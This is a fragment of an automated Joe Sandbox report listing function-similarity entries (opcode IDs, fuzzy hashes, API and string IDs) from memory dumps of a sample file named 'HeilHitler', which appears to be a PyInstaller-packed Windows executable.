                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                            • Instruction ID: 90475f0fd0d7d088c2114eb0507e0294339e14a51f3425513cb590e4e8a7c3a8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E351A176A1865186E7248F69C04627837A0FB45F68F244331CE9DA77A4DF3AE843E740
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                            • Instruction ID: 8c8c53186f5a4a86dfade6a52309069fc3799063abd488257601886f5d61ad5f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0518376A28A5182E7248F69C04137837A1EB45F68F244331DE8DA7795DF3AE853DB40
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                            • Instruction ID: 3d30e22eac2da69a26b189011b0e9b9a4b641136967f0424b5988d76506766e5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3851B136A18A5186E7258FA9C04633877A1EB45F58F285331DE4CA7794DF3AEC43E740
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                            • Instruction ID: 915d9ae5f0f63b84579358a11b4abef7d190fcc271556e85ceb0368ff4a4a467
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA51A137A1869186E7248F69C04633877A0EB44F58F244331CE4CA77A9CF3AE853E740
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                            • Instruction ID: e932a840f88a994914cd9f2d058417239f7ab6cdb26019f3a725234717a1ef00
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B515E76A1865186E7348F69C04627C37A1EB49B58F284331CE4DA7799CF3AEC53E780
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction ID: da1be9170bb503dff77425e728863b08797a0ab264545c8ff2b6099e016c6346
• Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction Fuzzy Hash: 7641E562C1D78A05EDA98DDC050A6B827829F12BA0F5813B5DDADB73C3DD0D6586E203
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
• Instruction ID: 66d7bf529f6aef5a0606e74924a7c16ee4c844b59739c0ac9b9a944361dfab64
• Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
• Instruction Fuzzy Hash: CA412522714A5582EF04CFAAD925579B3A1FB48FC0B499636EE0DE7B58EE3DD0529300
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
• Instruction ID: 5dc3445b0b061483ad8436e507d0d7ec47e32ef1d2347056d39645f25f8b1a2d
• Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
• Instruction Fuzzy Hash: 8B31D532B09B4241E7649F65A84213EBAD5AF84BD0F544338EE8DA7BD5DF3CD0129704
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
• Instruction ID: a25b464db52bd6f6cc4b4066ae64ba2c9e6b0e4b40955be02976ff23651c9a75
• Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
• Instruction Fuzzy Hash: 15F04471B182958ADB988FADA40362977D1F7083C0F449139D58DC3F04DE3C90519F04
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
• Instruction ID: e3ecd5e42d6249402766b6146058c56e86eb0c910cc396ae47fa564b29b5e17c
• Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
• Instruction Fuzzy Hash: 5BA00121D0C80AD4E6448B81A8A21252220BB95310B801231E02DB52B89E2CA504A340
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction ID: d3a152d9022fc5cbed8f13374cf45911348c57e92719812608b5a812cbb71400
• Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction Fuzzy Hash: AB02E525E0DB0B90FA459BE5A8129B433A1BF05754F942335E43EAA3A5FF3CB559B300
APIs
  • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF633D686B7,?,?,00000000,00007FF633D63CBB), ref: 00007FF633D6822C
  • Part of subcall function 00007FF633D62810: MessageBoxW.USER32 ref: 00007FF633D628EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
• Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
• Instruction ID: 16f7a4d3d11730a4688e763166bcd7f3f1033222b3c64f62f783ab04b24030c7
• Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
• Instruction Fuzzy Hash: A351B721A2C64281FA509BA5E8536BA7360AF94781F845631E61FE77D5FE3CF504A300
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
• Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction ID: 15a930fb3604a091e0071d4d3dfc1e71deb172d3b171f49913c23aa53b7f5003
• Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction Fuzzy Hash: 6C51E726608BA186D6349F36E4181BAB7A1F798B65F004225EFDF83795DF3CD085DB10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
• Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
• Instruction ID: 8102a2354b22de0beb218e9c40ede504b4c952b5fd5cbce5b8658eff246ae12e
• Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
• Instruction Fuzzy Hash: 5C21B721B08A4281E7418BFAE8561797250FF89F91F585330DE3ED73E9DE2CE5959300
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: a1e15ba2d683aff4b89c6501d1bc6059eaef906aa9de14d71b9258e8bcd0fd10
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: 2B12A372E0C24386FB645E94D1562BD76A2FB50754FC84235E68DA6BC4FF3CE980AB00
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: 566f00aa2c38b411a9e5758c010c0e7eed45ca89efc92fd79a1817dff0e078d3
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: FA12B762E0C14386FB245E94E0466B977A1FB80794FD84335E69E97BC4DF3CE484AB00
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 3201fc6698c0733d934283fdf0b7fc99b444569cb26fde5c5b53d3a473a789a2
• Instruction ID: 51369ca1f2913a88d74bca2540edec8a31f8be4fd1f1aeef11c464701a6b4028
• Opcode Fuzzy Hash: 3201fc6698c0733d934283fdf0b7fc99b444569cb26fde5c5b53d3a473a789a2
• Instruction Fuzzy Hash: E841A861B0865282EA10DB91A8076B973A0FF44BC4F844632ED9CE7796DF3CF546A740
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                            • Opcode ID: b7d9ed86abc52d5975ef8ae8469ac47edc22ad97562613f38df161424eb54398
                                                                                                                                                                                                                                            • Instruction ID: d4d2e6fea381ba84e704f53d4ba53531d05f7e933aa213446e06bfb832ffe5c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7d9ed86abc52d5975ef8ae8469ac47edc22ad97562613f38df161424eb54398
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E241A031A0864286EB10DFA1D4125B9B3A0FF44794F844A32EDADA7B95DE3CE546A704
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                                            • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                            • Instruction ID: fb1b30cd20393363f9eab9516b10b03b0fc1f1707cefceac0430de3548b9ee72
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CD1D432A08B4186EB20DFA5D5423AD37A0FB54788F900335EE5DA77AADF38E095D740
                                                                                                                                                                                                                                            APIs
